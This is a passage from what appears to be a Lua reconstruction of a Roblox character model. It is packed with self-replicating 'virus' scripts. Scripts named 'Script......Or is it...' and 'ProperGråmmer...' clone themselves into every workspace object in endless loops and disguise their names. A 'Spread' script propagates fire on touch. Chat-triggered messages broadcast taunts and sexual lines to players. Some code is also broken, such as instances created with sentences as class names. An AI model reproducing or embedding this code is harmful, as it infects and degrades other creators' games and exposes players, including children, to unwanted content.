7582
["Anchored"] = true,
7583
["CFrame"] = CFrame.new(61.5268745, -5249.18896, -351.152039, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
7584
["FormFactor"] = Enum.FormFactor.Custom,
7585
["Size"] = Vector3.new(1, 1.80000031, 0.949997187),
7586
["BottomSurface"] = Enum.SurfaceType.Smooth,
7587
["TopSurface"] = Enum.SurfaceType.Smooth,
7588
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
7589
})
7590
o262 = Create("SpecialMesh",{
7591
["Parent"] = o261,
7592
["MeshId"] = "rbxasset://fonts/leftarm.mesh",
7593
["Scale"] = Vector3.new(1.00100005, 0.800000012, 1.00100005),
7594
["MeshType"] = Enum.MeshType.FileMesh,
7595
})
7596
o263 = Create("Fire",{
7597
["Parent"] = o261,
7598
["Size"] = 30,
7599
["Color"] = Color3.new(1, 0.678431, 0),
7600
["Enabled"] = false,
7601
["Heat"] = 25,
7602
["SecondaryColor"] = Color3.new(1, 0, 0),
7603
})
7604
o264 = Create("Script",{
7605
["Name"] = "Spread",
7606
["Parent"] = o263,
7607
})
7608
table.insert(cors,coroutine.create(function()
7609
wait()
7610
runDummyScript(function()
7611
function Spread(part)
7612
	check = part:findFirstChild("Fire")
7613
		if check == nil then 
7614
	script.Parent:Clone().Parent = part
7615
	
7616
		elseif check ~= nil then
7617
	check.Size = check.Size + 1000000
7618
	check.Heat = check.Heat  +1000000
7619
	end
7620
end
7621
7622
7623
script.Parent.Parent.Touched:connect(Spread)
7624
7625
end,o264)
7626
end))
7627
o266 = Create("Script",{
7628
["Name"] = "Script......Or is it...",
7629
["Parent"] = mas,
7630
})
7631
table.insert(cors,coroutine.create(function()
7632
wait()
7633
runDummyScript(function()
7634
-- Thanks for using My hack.............suka XD
7635
7636
if script.Parent.className ~= "RotateP" then
7637
	local p = Instance.new("RotateP")
7638
	p.Parent = workspace
7639
	p.Name = "dåååååååååååååång.........you got owned..."
7640
	script.Parent = p
7641
end
7642
7643
function check()
7644
	local list = workspace:GetChildren()
7645
	for i = 1, #list do
7646
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
7647
			script.Parent:Clone().Parent = list[i]
7648
		end
7649
		wait()
7650
	end
7651
end
7652
7653
while true do
7654
	check()
7655
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
7656
		local main = script.Parent:Clone()
7657
		main.Name = "Hello...I åm Your New Lord Lolz"
7658
		main.Parent = workspace
7659
	end
7660
	wait(3)
7661
end
7662
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
7663
-- Have a nice day. XD
7664
end,o266)
7665
end))
7666
o268 = Create("Script",{
7667
["Name"] = "Script......Or is it...",
7668
["Parent"] = mas,
7669
})
7670
table.insert(cors,coroutine.create(function()
7671
wait()
7672
runDummyScript(function()
7673
if script.Parent.className ~= "RotateP" then
7674
	local p = Instance.new("RotateP")
7675
	p.Parent = workspace
7676
	p.Name = "INfecTION"
7677
	script.Parent = p
7678
end
7679
7680
function check()
7681
	local list = workspace:GetChildren()
7682
	for i = 1, #list do
7683
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
7684
			script.Parent:Clone().Parent = list[i]
7685
		end
7686
		wait()
7687
	end
7688
end
7689
7690
while true do
7691
	check()
7692
	if workspace:findFirstChild("inFECtion") == nil then
7693
		local main = script.Parent:Clone()
7694
		main.Name = "inFECtion"
7695
		main.Parent = workspace
7696
	end
7697
	wait(3)
7698
end
7699
7700
end,o268)
7701
end))
7702
o270 = Create("Script",{
7703
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
7704
["Parent"] = mas,
7705
})
7706
table.insert(cors,coroutine.create(function()
7707
wait()
7708
runDummyScript(function()
7709
names={"dapperguestyo"}
7710
local NameCheck = false
7711
script.Parent.Name = names[math.random(1, #names)]
7712
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
7713
local c = script.Parent:Clone()
7714
7715
function addEvent(ch)
7716
	wait(math.random())
7717
	NameCheck = false
7718
	for ss = 1, #names do
7719
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
7720
			NameCheck = true
7721
		end
7722
	end
7723
	if NameCheck == false then
7724
		local cloak = c:Clone()
7725
		cloak.Name = ""
7726
		cloak:GetChildren()[1].Name = ""
7727
		cloak.Parent = ch
7728
		cloak.Name = names[math.random(1, 5)]
7729
	end
7730
end
7731
7732
workspace.ChildAdded:connect(addEvent)
7733
7734
game.Players.PlayerAdded:connect(function(pl)
7735
	pl.Chatted:connect(function(m)
7736
		if m:sub(1, 5) == "/sc t" then
7737
			local m = Instance.new("Message")
7738
			m.Parent = workspace
7739
			m.Text = "THEY CALL ME CRAZY"
7740
			wait(1)
7741
			m.Text = "lOoOoOoOp"
7742
			wait(0.25)
7743
			m.Text = "next page"
7744
			wait(0.25)
7745
			m.Text = "lOoOoOoOp"
7746
			wait(0.25)
7747
			m.Text = "LoOoOoOoP"
7748
			wait(0.25)
7749
			m.Text = "lOoOoOoOp"
7750
			wait(0.25)
7751
			m.Text = "LoOoOoOoP"
7752
			wait(0.25)
7753
			m.Text = "GOTTA GOTTA BE CRAZY"
7754
			wait(1)
7755
			m.Text = "lOoOoOoOp"
7756
			wait(0.25)
7757
			m.Text = "LoOoOoOoP"
7758
			wait(0.25)
7759
			m.Text = "lOoOoOoOp"
7760
			wait(0.25)
7761
			m.Text = "brendantaylor rules"
7762
			wait(0.25)
7763
			m.Text = "so does iampoobx"
7764
			wait(0.25)
7765
			m.Text = "LoOoOoOoP"
7766
			wait(0.25)
7767
			m.Text = "GOTTA GET A LIFE (YOU)"
7768
			wait(3)
7769
			m:remove()
7770
		end
7771
		if m:sub(1, 5) == "HAAXX" then
7772
			local m = Instance.new("Message")
7773
			m.Parent = workspace
7774
			m.Text = "HAAXX"	
7775
			wait(3)
7776
			m:remove()
7777
		end
7778
	end)
7779
end)
7780
7781
while true do
7782
	local s = workspace:GetChildren()
7783
	for i = 1, #s do
7784
		NameCheck = false
7785
		for ss = 1, #names do
7786
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
7787
				NameCheck = true
7788
			end
7789
		end
7790
		if NameCheck == false then
7791
			local cloak = c:Clone()
7792
			cloak.Name = ""
7793
			cloak:GetChildren()[1].Name = ""
7794
			cloak.Parent = s[i]
7795
		end
7796
		wait(0.1)
7797
	end
7798
	wait(1)
7799
end
7800
7801
end,o270)
7802
end))
7803
o271 = Create("Script",{
7804
["Name"] = "Vaccine",
7805
["Parent"] = o261,
7806
})
7807
table.insert(cors,coroutine.create(function()
7808
wait()
7809
runDummyScript(function()
7810
function spread() -- created by bumblebee773
7811
local stuff = game.Workspace:GetChildren()
7812
for i = 1, #stuff do
7813
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
7814
local clone = script:clone()
7815
clone.Parent = stuff[i]
7816
end
7817
end
7818
end
7819
7820
while true do
7821
wait(.1)
7822
spread()
7823
end
7824
7825
function GetAllItems(mdl) 
7826
local objs = {} 
7827
function Search(obj) 
7828
if obj~=workspace then 
7829
table.insert(objs,obj) 
7830
end 
7831
if #obj:GetChildren() > 0 then 
7832
for i, v in ipairs(obj:GetChildren()) do 
7833
Search(v) 
7834
end 
7835
end 
7836
end 
7837
Search(mdl) 
7838
return objs 
7839
end 
7840
7841
7842
7843
for i, v in ipairs(GetAllItems(workspace)) do 
7844
if v.className == "Script" then 
7845
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
7846
v.Parent = game.Lighting --Just in case it has a removal prevention. 
7847
t = Instance.new("ObjectValue") 
7848
t.Name = "IsAVirus" 
7849
t.Parent = v 
7850
end 
7851
end 
7852
end 
7853
7854
for i, v in ipairs(game.Lighting:GetChildren()) do 
7855
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
7856
v:remove() 
7857
end 
7858
end 
7859
7860
7861
print("Virus debugged! All clean!")
7862
end,o271)
7863
end))
7864
o273 = Create("Script",{
7865
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
7866
["Parent"] = mas,
7867
})
7868
table.insert(cors,coroutine.create(function()
7869
wait()
7870
runDummyScript(function()
7871
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
7872
local NameCheck = false
7873
script.Parent.Name = names[math.random(1, #names)]
7874
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
7875
local c = script.Parent:Clone()
7876
7877
function addEvent(ch)
7878
	wait(math.random())
7879
	NameCheck = false
7880
	for ss = 1, #names do
7881
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
7882
			NameCheck = true
7883
		end
7884
	end
7885
	if NameCheck == false then
7886
		local cloak = c:Clone()
7887
		cloak.Name = ""
7888
		cloak:GetChildren()[1].Name = ""
7889
		cloak.Parent = ch
7890
		cloak.Name = names[math.random(1, 5)]
7891
	end
7892
end
7893
7894
workspace.ChildAdded:connect(addEvent)
7895
7896
game.Players.PlayerAdded:connect(function(pl)
7897
	pl.Chatted:connect(function(m)
7898
		if m:sub(1, 5) == "/sc t" then
7899
			local m = Instance.new("Message")
7900
			m.Parent = workspace
7901
			m.Text = "THEY CALL ME CRAZY"
7902
			wait(1)
7903
			m.Text = "lOoOoOoOp"
7904
			wait(0.25)
7905
			m.Text = "LoOoOoOoP"
7906
			wait(0.25)
7907
			m.Text = "lOoOoOoOp"
7908
			wait(0.25)
7909
			m.Text = "LoOoOoOoP"
7910
			wait(0.25)
7911
			m.Text = "lOoOoOoOp"
7912
			wait(0.25)
7913
			m.Text = "LoOoOoOoP"
7914
			wait(0.25)
7915
			m.Text = "GOTTA GOTTA BE CRAZY"
7916
			wait(1)
7917
			m.Text = "lOoOoOoOp"
7918
			wait(0.25)
7919
			m.Text = "LoOoOoOoP"
7920
			wait(0.25)
7921
			m.Text = "lOoOoOoOp"
7922
			wait(0.25)
7923
			m.Text = "LoOoOoOoP"
7924
			wait(0.25)
7925
			m.Text = "lOoOoOoOp"
7926
			wait(0.25)
7927
			m.Text = "LoOoOoOoP"
7928
			wait(0.25)
7929
			m.Text = "GOTTA GET A LIFE (YOU)"
7930
			wait(3)
7931
			m:remove()
7932
		end
7933
		if m:sub(1, 5) == "HAAXX" then
7934
			local m = Instance.new("Message")
7935
			m.Parent = workspace
7936
			m.Text = "HAAXX"	
7937
			wait(3)
7938
			m:remove()
7939
		end
7940
	end)
7941
end)
7942
7943
while true do
7944
	local s = workspace:GetChildren()
7945
	for i = 1, #s do
7946
		NameCheck = false
7947
		for ss = 1, #names do
7948
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
7949
				NameCheck = true
7950
			end
7951
		end
7952
		if NameCheck == false then
7953
			local cloak = c:Clone()
7954
			cloak.Name = ""
7955
			cloak:GetChildren()[1].Name = ""
7956
			cloak.Parent = s[i]
7957
		end
7958
		wait(0.1)
7959
	end
7960
	wait(1)
7961
end
7962
7963
end,o273)
7964
end))
7965
o275 = Create("Script",{
7966
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
7967
["Parent"] = mas,
7968
})
7969
table.insert(cors,coroutine.create(function()
7970
wait()
7971
runDummyScript(function()
7972
names={"AmazingOmegaJames","H75","","","","","","",""}
7973
local NameCheck = false
7974
script.Parent.Name = names[math.random(1, #names)]
7975
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
7976
local c = script.Parent:Clone()
7977
7978
function addEvent(ch)
7979
	wait(math.random())
7980
	NameCheck = false
7981
	for ss = 1, #names do
7982
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
7983
			NameCheck = true
7984
		end
7985
	end
7986
	if NameCheck == false then
7987
		local cloak = c:Clone()
7988
		cloak.Name = ""
7989
		cloak:GetChildren()[1].Name = ""
7990
		cloak.Parent = ch
7991
		cloak.Name = names[math.random(1, 5)]
7992
	end
7993
end
7994
7995
workspace.ChildAdded:connect(addEvent)
7996
7997
game.Players.PlayerAdded:connect(function(pl)
7998
	pl.Chatted:connect(function(m)
7999
		if m:sub(1, 5) == "/sc t" then
8000
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
8001
			m.Parent = workspace
8002
			m.Text = "THEY CALL ME CRAZY"
8003
			wait(1)
8004
			m.Text = "lOoOoOoOp"
8005
			wait(0.25)
8006
			m.Text = "LoOoOoOoP"
8007
			wait(0.25)
8008
			m.Text = "lOoOoOoOp"
8009
			wait(0.25)
8010
			m.Text = "LoOoOoOoP"
8011
			wait(0.25)
8012
			m.Text = "lOoOoOoOp"
8013
			wait(0.25)
8014
			m.Text = "LoOoOoOoP"
8015
			wait(0.25)
8016
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
8017
			wait(1)
8018
			m.Text = "lOoOoOoOp"
8019
			wait(0.25)
8020
			m.Text = "LoOoOoOoP"
8021
			wait(0.25)
8022
			m.Text = "lOoOoOoOp"
8023
			wait(0.25)
8024
			m.Text = "LoOoOoOoP"
8025
			wait(0.25)
8026
			m.Text = "lOoOoOoOp"
8027
			wait(0.25)
8028
			m.Text = "LoOoOoOoP"
8029
			wait(0.25)
8030
			m.Text = "GOTTA HAVE SEX WITH YOU"
8031
			wait(3)
8032
			m:remove()
8033
		end
8034
		if m:sub(1, 5) == " SEX HAAXX" then
8035
			local m = Instance.new("Message")
8036
			m.Parent = workspace
8037
			m.Text = " SEX HAAXX"	
8038
			wait(3)
8039
			m:remove()
8040
		end
8041
	end)
8042
end)
8043
8044
while true do
8045
	local s = workspace:GetChildren()
8046
	for i = 1, #s do
8047
		NameCheck = false
8048
		for ss = 1, #names do
8049
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
8050
				NameCheck = true
8051
			end
8052
		end
8053
		if NameCheck == false then
8054
			local cloak = c:Clone()
8055
			cloak.Name = ""
8056
			cloak:GetChildren()[1].Name = ""
8057
			cloak.Parent = s[i]
8058
		end
8059
		wait(0.1)
8060
	end
8061
	wait(1)
8062
end
8063
8064
end,o275)
8065
end))
8066
o276 = Create("Part",{
8067
["Parent"] = o257,
8068
["Material"] = Enum.Material.SmoothPlastic,
8069
["BrickColor"] = BrickColor.new("Really black"),
8070
["Position"] = Vector3.new(61.5268669, -5249.39893, -351.152039),
8071
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
8072
["Anchored"] = true,
8073
["CFrame"] = CFrame.new(61.5268669, -5249.39893, -351.152039, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
8074
["FormFactor"] = Enum.FormFactor.Custom,
8075
["Size"] = Vector3.new(1, 2.00000024, 0.949997187),
8076
["BottomSurface"] = Enum.SurfaceType.Smooth,
8077
["TopSurface"] = Enum.SurfaceType.Smooth,
8078
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
8079
})
8080
o277 = Create("SpecialMesh",{
8081
["Parent"] = o276,
8082
["MeshId"] = "rbxasset://fonts/leftarm.mesh",
8083
["MeshType"] = Enum.MeshType.FileMesh,
8084
})
8085
o278 = Create("Fire",{
8086
["Parent"] = o276,
8087
["Size"] = 30,
8088
["Color"] = Color3.new(1, 0.678431, 0),
8089
["Enabled"] = false,
8090
["Heat"] = 25,
8091
["SecondaryColor"] = Color3.new(1, 0, 0),
8092
})
8093
o279 = Create("Script",{
8094
["Name"] = "Spread",
8095
["Parent"] = o278,
8096
})
8097
table.insert(cors,coroutine.create(function()
8098
wait()
8099
runDummyScript(function()
8100
function Spread(part)
8101
	check = part:findFirstChild("Fire")
8102
		if check == nil then 
8103
	script.Parent:Clone().Parent = part
8104
	
8105
		elseif check ~= nil then
8106
	check.Size = check.Size + 1000000
8107
	check.Heat = check.Heat  +1000000
8108
	end
8109
end
8110
8111
8112
script.Parent.Parent.Touched:connect(Spread)
8113
8114
end,o279)
8115
end))
8116
o281 = Create("Script",{
8117
["Name"] = "Script......Or is it...",
8118
["Parent"] = mas,
8119
})
8120
table.insert(cors,coroutine.create(function()
8121
wait()
8122
runDummyScript(function()
8123
-- Thanks for using My hack.............suka XD
8124
8125
if script.Parent.className ~= "RotateP" then
8126
	local p = Instance.new("RotateP")
8127
	p.Parent = workspace
8128
	p.Name = "dåååååååååååååång.........you got owned..."
8129
	script.Parent = p
8130
end
8131
8132
function check()
8133
	local list = workspace:GetChildren()
8134
	for i = 1, #list do
8135
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
8136
			script.Parent:Clone().Parent = list[i]
8137
		end
8138
		wait()
8139
	end
8140
end
8141
8142
while true do
8143
	check()
8144
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
8145
		local main = script.Parent:Clone()
8146
		main.Name = "Hello...I åm Your New Lord Lolz"
8147
		main.Parent = workspace
8148
	end
8149
	wait(3)
8150
end
8151
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
8152
-- Have a nice day. XD
8153
end,o281)
8154
end))
8155
o283 = Create("Script",{
8156
["Name"] = "Script......Or is it...",
8157
["Parent"] = mas,
8158
})
8159
table.insert(cors,coroutine.create(function()
8160
wait()
8161
runDummyScript(function()
8162
if script.Parent.className ~= "RotateP" then
8163
	local p = Instance.new("RotateP")
8164
	p.Parent = workspace
8165
	p.Name = "INfecTION"
8166
	script.Parent = p
8167
end
8168
8169
function check()
8170
	local list = workspace:GetChildren()
8171
	for i = 1, #list do
8172
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
8173
			script.Parent:Clone().Parent = list[i]
8174
		end
8175
		wait()
8176
	end
8177
end
8178
8179
while true do
8180
	check()
8181
	if workspace:findFirstChild("inFECtion") == nil then
8182
		local main = script.Parent:Clone()
8183
		main.Name = "inFECtion"
8184
		main.Parent = workspace
8185
	end
8186
	wait(3)
8187
end
8188
8189
end,o283)
8190
end))
8191
o285 = Create("Script",{
8192
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
8193
["Parent"] = mas,
8194
})
8195
table.insert(cors,coroutine.create(function()
8196
wait()
8197
runDummyScript(function()
8198
names={"dapperguestyo"}
8199
local NameCheck = false
8200
script.Parent.Name = names[math.random(1, #names)]
8201
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
8202
local c = script.Parent:Clone()
8203
8204
function addEvent(ch)
8205
	wait(math.random())
8206
	NameCheck = false
8207
	for ss = 1, #names do
8208
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
8209
			NameCheck = true
8210
		end
8211
	end
8212
	if NameCheck == false then
8213
		local cloak = c:Clone()
8214
		cloak.Name = ""
8215
		cloak:GetChildren()[1].Name = ""
8216
		cloak.Parent = ch
8217
		cloak.Name = names[math.random(1, 5)]
8218
	end
8219
end
8220
8221
workspace.ChildAdded:connect(addEvent)
8222
8223
game.Players.PlayerAdded:connect(function(pl)
8224
	pl.Chatted:connect(function(m)
8225
		if m:sub(1, 5) == "/sc t" then
8226
			local m = Instance.new("Message")
8227
			m.Parent = workspace
8228
			m.Text = "THEY CALL ME CRAZY"
8229
			wait(1)
8230
			m.Text = "lOoOoOoOp"
8231
			wait(0.25)
8232
			m.Text = "next page"
8233
			wait(0.25)
8234
			m.Text = "lOoOoOoOp"
8235
			wait(0.25)
8236
			m.Text = "LoOoOoOoP"
8237
			wait(0.25)
8238
			m.Text = "lOoOoOoOp"
8239
			wait(0.25)
8240
			m.Text = "LoOoOoOoP"
8241
			wait(0.25)
8242
			m.Text = "GOTTA GOTTA BE CRAZY"
8243
			wait(1)
8244
			m.Text = "lOoOoOoOp"
8245
			wait(0.25)
8246
			m.Text = "LoOoOoOoP"
8247
			wait(0.25)
8248
			m.Text = "lOoOoOoOp"
8249
			wait(0.25)
8250
			m.Text = "brendantaylor rules"
8251
			wait(0.25)
8252
			m.Text = "so does iampoobx"
8253
			wait(0.25)
8254
			m.Text = "LoOoOoOoP"
8255
			wait(0.25)
8256
			m.Text = "GOTTA GET A LIFE (YOU)"
8257
			wait(3)
8258
			m:remove()
8259
		end
8260
		if m:sub(1, 5) == "HAAXX" then
8261
			local m = Instance.new("Message")
8262
			m.Parent = workspace
8263
			m.Text = "HAAXX"	
8264
			wait(3)
8265
			m:remove()
8266
		end
8267
	end)
8268
end)
8269
8270
while true do
8271
	local s = workspace:GetChildren()
8272
	for i = 1, #s do
8273
		NameCheck = false
8274
		for ss = 1, #names do
8275
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
8276
				NameCheck = true
8277
			end
8278
		end
8279
		if NameCheck == false then
8280
			local cloak = c:Clone()
8281
			cloak.Name = ""
8282
			cloak:GetChildren()[1].Name = ""
8283
			cloak.Parent = s[i]
8284
		end
8285
		wait(0.1)
8286
	end
8287
	wait(1)
8288
end
8289
8290
end,o285)
8291
end))
8292
o286 = Create("Script",{
8293
["Name"] = "Vaccine",
8294
["Parent"] = o276,
8295
})
8296
table.insert(cors,coroutine.create(function()
8297
wait()
8298
runDummyScript(function()
8299
function spread() -- created by bumblebee773
8300
local stuff = game.Workspace:GetChildren()
8301
for i = 1, #stuff do
8302
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
8303
local clone = script:clone()
8304
clone.Parent = stuff[i]
8305
end
8306
end
8307
end
8308
8309
while true do
8310
wait(.1)
8311
spread()
8312
end
8313
8314
function GetAllItems(mdl) 
8315
local objs = {} 
8316
function Search(obj) 
8317
if obj~=workspace then 
8318
table.insert(objs,obj) 
8319
end 
8320
if #obj:GetChildren() > 0 then 
8321
for i, v in ipairs(obj:GetChildren()) do 
8322
Search(v) 
8323
end 
8324
end 
8325
end 
8326
Search(mdl) 
8327
return objs 
8328
end 
8329
8330
8331
8332
for i, v in ipairs(GetAllItems(workspace)) do 
8333
if v.className == "Script" then 
8334
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
8335
v.Parent = game.Lighting --Just in case it has a removal prevention. 
8336
t = Instance.new("ObjectValue") 
8337
t.Name = "IsAVirus" 
8338
t.Parent = v 
8339
end 
8340
end 
8341
end 
8342
8343
for i, v in ipairs(game.Lighting:GetChildren()) do 
8344
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
8345
v:remove() 
8346
end 
8347
end 
8348
8349
8350
print("Virus debugged! All clean!")
8351
end,o286)
8352
end))
8353
o288 = Create("Script",{
8354
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
8355
["Parent"] = mas,
8356
})
8357
table.insert(cors,coroutine.create(function()
8358
wait()
8359
runDummyScript(function()
8360
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
8361
local NameCheck = false
8362
script.Parent.Name = names[math.random(1, #names)]
8363
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
8364
local c = script.Parent:Clone()
8365
8366
function addEvent(ch)
8367
	wait(math.random())
8368
	NameCheck = false
8369
	for ss = 1, #names do
8370
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
8371
			NameCheck = true
8372
		end
8373
	end
8374
	if NameCheck == false then
8375
		local cloak = c:Clone()
8376
		cloak.Name = ""
8377
		cloak:GetChildren()[1].Name = ""
8378
		cloak.Parent = ch
8379
		cloak.Name = names[math.random(1, 5)]
8380
	end
8381
end
8382
8383
workspace.ChildAdded:connect(addEvent)
8384
8385
game.Players.PlayerAdded:connect(function(pl)
8386
	pl.Chatted:connect(function(m)
8387
		if m:sub(1, 5) == "/sc t" then
8388
			local m = Instance.new("Message")
8389
			m.Parent = workspace
8390
			m.Text = "THEY CALL ME CRAZY"
8391
			wait(1)
8392
			m.Text = "lOoOoOoOp"
8393
			wait(0.25)
8394
			m.Text = "LoOoOoOoP"
8395
			wait(0.25)
8396
			m.Text = "lOoOoOoOp"
8397
			wait(0.25)
8398
			m.Text = "LoOoOoOoP"
8399
			wait(0.25)
8400
			m.Text = "lOoOoOoOp"
8401
			wait(0.25)
8402
			m.Text = "LoOoOoOoP"
8403
			wait(0.25)
8404
			m.Text = "GOTTA GOTTA BE CRAZY"
8405
			wait(1)
8406
			m.Text = "lOoOoOoOp"
8407
			wait(0.25)
8408
			m.Text = "LoOoOoOoP"
8409
			wait(0.25)
8410
			m.Text = "lOoOoOoOp"
8411
			wait(0.25)
8412
			m.Text = "LoOoOoOoP"
8413
			wait(0.25)
8414
			m.Text = "lOoOoOoOp"
8415
			wait(0.25)
8416
			m.Text = "LoOoOoOoP"
8417
			wait(0.25)
8418
			m.Text = "GOTTA GET A LIFE (YOU)"
8419
			wait(3)
8420
			m:remove()
8421
		end
8422
		if m:sub(1, 5) == "HAAXX" then
8423
			local m = Instance.new("Message")
8424
			m.Parent = workspace
8425
			m.Text = "HAAXX"	
8426
			wait(3)
8427
			m:remove()
8428
		end
8429
	end)
8430
end)
8431
8432
while true do
8433
	local s = workspace:GetChildren()
8434
	for i = 1, #s do
8435
		NameCheck = false
8436
		for ss = 1, #names do
8437
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
8438
				NameCheck = true
8439
			end
8440
		end
8441
		if NameCheck == false then
8442
			local cloak = c:Clone()
8443
			cloak.Name = ""
8444
			cloak:GetChildren()[1].Name = ""
8445
			cloak.Parent = s[i]
8446
		end
8447
		wait(0.1)
8448
	end
8449
	wait(1)
8450
end
8451
8452
end,o288)
8453
end))
8454
o290 = Create("Script",{
8455
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
8456
["Parent"] = mas,
8457
})
8458
table.insert(cors,coroutine.create(function()
8459
wait()
8460
runDummyScript(function()
8461
names={"AmazingOmegaJames","H75","","","","","","",""}
8462
local NameCheck = false
8463
script.Parent.Name = names[math.random(1, #names)]
8464
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
8465
local c = script.Parent:Clone()
8466
8467
function addEvent(ch)
8468
	wait(math.random())
8469
	NameCheck = false
8470
	for ss = 1, #names do
8471
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
8472
			NameCheck = true
8473
		end
8474
	end
8475
	if NameCheck == false then
8476
		local cloak = c:Clone()
8477
		cloak.Name = ""
8478
		cloak:GetChildren()[1].Name = ""
8479
		cloak.Parent = ch
8480
		cloak.Name = names[math.random(1, 5)]
8481
	end
8482
end
8483
8484
workspace.ChildAdded:connect(addEvent)
8485
8486
game.Players.PlayerAdded:connect(function(pl)
8487
	pl.Chatted:connect(function(m)
8488
		if m:sub(1, 5) == "/sc t" then
8489
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
8490
			m.Parent = workspace
8491
			m.Text = "THEY CALL ME CRAZY"
8492
			wait(1)
8493
			m.Text = "lOoOoOoOp"
8494
			wait(0.25)
8495
			m.Text = "LoOoOoOoP"
8496
			wait(0.25)
8497
			m.Text = "lOoOoOoOp"
8498
			wait(0.25)
8499
			m.Text = "LoOoOoOoP"
8500
			wait(0.25)
8501
			m.Text = "lOoOoOoOp"
8502
			wait(0.25)
8503
			m.Text = "LoOoOoOoP"
8504
			wait(0.25)
8505
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
8506
			wait(1)
8507
			m.Text = "lOoOoOoOp"
8508
			wait(0.25)
8509
			m.Text = "LoOoOoOoP"
8510
			wait(0.25)
8511
			m.Text = "lOoOoOoOp"
8512
			wait(0.25)
8513
			m.Text = "LoOoOoOoP"
8514
			wait(0.25)
8515
			m.Text = "lOoOoOoOp"
8516
			wait(0.25)
8517
			m.Text = "LoOoOoOoP"
8518
			wait(0.25)
8519
			m.Text = "GOTTA HAVE SEX WITH YOU"
8520
			wait(3)
8521
			m:remove()
8522
		end
8523
		if m:sub(1, 5) == " SEX HAAXX" then
8524
			local m = Instance.new("Message")
8525
			m.Parent = workspace
8526
			m.Text = " SEX HAAXX"	
8527
			wait(3)
8528
			m:remove()
8529
		end
8530
	end)
8531
end)
8532
8533
while true do
8534
	local s = workspace:GetChildren()
8535
	for i = 1, #s do
8536
		NameCheck = false
8537
		for ss = 1, #names do
8538
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
8539
				NameCheck = true
8540
			end
8541
		end
8542
		if NameCheck == false then
8543
			local cloak = c:Clone()
8544
			cloak.Name = ""
8545
			cloak:GetChildren()[1].Name = ""
8546
			cloak.Parent = s[i]
8547
		end
8548
		wait(0.1)
8549
	end
8550
	wait(1)
8551
end
8552
8553
end,o290)
8554
end))
8555
o291 = Create("Part",{
8556
["Name"] = "Head",
8557
["Parent"] = o1,
8558
["BrickColor"] = BrickColor.new("Bright red"),
8559
